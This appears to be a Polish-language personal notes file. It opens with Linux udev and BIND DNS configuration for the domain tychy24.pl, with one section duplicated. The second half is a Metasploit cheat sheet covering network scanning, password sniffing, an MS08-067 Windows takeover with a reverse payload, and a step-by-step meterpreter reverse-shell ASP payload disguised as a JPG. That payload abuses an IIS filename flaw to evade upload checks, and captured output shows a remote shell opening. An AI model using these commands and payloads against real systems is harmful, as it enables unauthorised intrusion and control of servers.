/etc/udev/rules.d/????-net.rules
zmień mac na właściwy
np:
SUBSYSTEM=="net", DRIVERS=="?*", ATTRS{address}=="00:50:56:ae:20:ec", NAME="eth0"
/etc/udev/rules.d/????-net.rules
zmień mac na właściwy
np:
SUBSYSTEM=="net", DRIVERS=="?*", ATTRS{address}=="00:50:56:ae:20:ec", NAME="eth0"
/etc/bind/named.conf
zone "tychy24.pl" {
type master;
file "/etc/bind/tychy24.pl";
};
zone "26.241.248.195.in-addr.arpa" IN {
type master;
file "/etc/bind/pl.tychy24";
allow-update { none; };
allow-transfer { any; };
};
/etc/bind/tychy24.pl
$TTL 86400
@ IN SOA ns.tychy24.pl. your.email.here (
901 ; Serial
10800 ; Refresh
3600 ; Retry
604800 ; Expire
86400 ) ; Minimum
tychy24.pl. IN NS ns.tychy24.pl.
ns.tychy24.pl. IN A 195.248.241.26
ns1.tychy24.pl. IN A 195.248.241.26
ns2.tychy24.pl. IN A 195.248.241.26
dns.tychy24.pl. IN A 195.248.241.26
dns1.tychy24.pl. IN A 195.248.241.26
dns2.tychy24.pl. IN A 195.248.241.26
tychy24.pl. IN A 195.248.241.26
mail.tychy24.pl. IN A 195.248.241.26
smtp.tychy24.pl. IN A 195.248.241.26
webmail.tychy24.pl. IN A 195.248.241.26
ftp.tychy24.pl. IN CNAME tychy24.pl.
www.tychy24.pl. IN CNAME tychy24.pl.
tychy24.pl. IN MX 10 mail.tychy24.pl.
* IN A 195.248.241.26
/etc/bind/pl.tychy24
$TTL 86400
$ORIGIN 26.241.248.195.in-addr.arpa.
@ IN SOA ns1.tychy24.pl. ns2.tychy24.pl. (
2010031613
3H
15M
1W
1D )
26.241.248.195.in-addr.arpa. IN NS ns1.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR ns.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR ns1.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR ns2.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR dns.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR dns1.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR dns2.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR mail.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR smtp.tychy24.pl.
26.241.248.195.in-addr.arpa. IN PTR webmail.tychy24.pl.
BT4
- skanowanie podsieci porty 80
./pentest/exploits/framework3/msfconsole
use scanner/portscan/syn
set PORTS 80
set RHOSTS 192.168.0.0/24
set THREADS 10
run
- wersja systemu
use scanner/smb/version
- MSSQL
use scanner/mssql/mssql_ping
- skanowanie idle
use scanner/ip/ipidseq
- skanowanie ssh
use scanner/ssh/ssh_version
- anonimowe FTP
use scanner/ftp/anonymouse
- SNMP
use scanner/snmp/community
- podsłuchiwanie haseł pop3,imap,ftp,http
use auxiliary/sniffer/psnuffle
- przejęcie komputera z WINDOWS
use windows/smb/ms08_067_netapi
set RHOST 10.32.1.171 - cel
set lhost 10.32.1.85 - napastnik
set payload windows/vncinject/reverse_tcp
exploit
-----------------------------------------------------------------------------------------------
Do wygenerowania złośliwego kodu ASP posłużą nam następujące polecenia:
msfpayload windows/meterpreter/reverse_tcp \
LHOST=10.20.30.40 LPORT=8443 R | \
msfencode -t asp -o atak.asp
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 10.20.30.40
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
Po utworzeniu listenera oczekującego na połączenie, możemy już utworzyć testowy plik w jego ostatecznej postaci, za pomocą polecenia:
cat saint.jpg atak.asp > "atak.asp;.jpg"
Jak widać, nasz skrypt został połączony z plikiem JPG (w celu oszukania mechanizmów sprawdzania zawartości pliku) oraz nazwany atak.asp;.jpg (co pozwala na wykorzystanie właściwej luki serwera IIS w sposobie interpretacji nazw plików).
Teraz pozostaje już tylko załadowanie naszego pliku na serwer poprzez odpowiedni formularz (odpowiednia nazwa oraz zawartość graficzna pozwolą na obejście podstawowych mechanizmów zabezpieczających), a następnie wyświetlenie strony internetowej zawierającej załadowany uprzednio plik. Jeśli katalog do którego trafił nasz plik dysponuje prawami wykonania, złośliwy skrypt ASP zostanie wykonany. To z kolei spowoduje nawiązanie połączenie z przygotowanym wcześniej listenerem:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened
Następnie, po wydaniu w konsoli listenera polecenia:
msf exploit(handler) > sessions -i 1
oraz w kolejnej konsoli polecenia:
meterpreter > shell
otrzymamy ostatecznie wiersz poleceń docelowego serwera:
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\serwer>
-----------------------------------------------------------------------------------------------
http://www.hcsl.pl/2010/03/wamanie-do-win-xp-sp3-poprzez-ie.html
-----------------------------------------------------------------------------------------------
http://www.hcsl.pl/search/label/Testy%20penetracyjne
-----------------------------------------------------------------------------------------------